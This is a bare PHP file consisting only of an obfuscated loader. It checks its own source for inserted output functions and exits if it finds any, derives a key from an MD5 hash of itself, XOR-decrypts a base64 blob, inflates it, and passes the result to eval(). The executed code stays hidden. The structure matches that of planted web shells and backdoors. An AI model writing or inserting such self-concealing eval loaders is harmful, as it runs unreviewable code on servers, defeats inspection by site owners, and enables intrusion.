<?php
$iepyjoh="3b8dd0fb97db8359e68a86a8d42e805a";
$kqwdjvoeuyhv="06000d52550154555c5455510d55050b06040c510f07505d530003010b050659";
$pfkpvphjcfva="WO1kWPNxPnPKAZwRJFjiLuMeKBVFLHJTQkOg2RPAxU1xyrHeppTDrJTbkKgfgQp4QiayOJhzilp3t0Yosarxo13siF8aSAj1VcYKlxxg8U7a07ELVFCbIAweiAb5mTIembpYoYt2cjumSvNviqOefmq3UmRcquZbTIuAvcwvXzkjFV70UxS9q8wv7Y0COc0JDOtPfSijw3Iffz0yTEkOC+JihsQINwDc+iy9/BJYbD8NBuZEmlF7VBvLQO9Qdsz4u90=";
$ohgeiqmv=file_get_contents(__FILE__);
$rhjnylgpxx=str_replace($pfkpvphjcfva,"",$ohgeiqmv);
if(strpos($rhjnylgpxx,"ec"."ho")!==false||strpos($rhjnylgpxx,"pr"."int")!==false||strpos($rhjnylgpxx,"var_"."dump")!==false||strpos($rhjnylgpxx,"file_put_"."contents")!==false||strpos($rhjnylgpxx,"fw"."rite")!==false){die();}
$uoecfgm=str_replace(array($iepyjoh,$kqwdjvoeuyhv),array("SP_f0678573","KP_fadf1473"),$ohgeiqmv);
$yjowqkegnp=md5($uoecfgm);
$kgwstp=hex2bin($kqwdjvoeuyhv);
$rzrymhoi="";
$zgdrhx=strlen($yjowqkegnp);
for($dqwtxd=0;$dqwtxd<$zgdrhx;$dqwtxd++){
    $rzrymhoi.=chr(ord($kgwstp[$dqwtxd])^ord($yjowqkegnp[$dqwtxd]));
}
$qjmbneah=base64_decode($pfkpvphjcfva);
$kuvdhcd=strlen($qjmbneah);
$ymnjcvkkzsee="";
$bedtkddozhbo=strlen($rzrymhoi);
for($dqwtxd=0;$dqwtxd<$kuvdhcd;$dqwtxd++){
    $ymnjcvkkzsee.=$qjmbneah[$dqwtxd]^$rzrymhoi[$dqwtxd%$bedtkddozhbo];
}
$gdyckk="gz"."in"."fl"."ate";
eval($gdyckk($ymnjcvkkzsee));
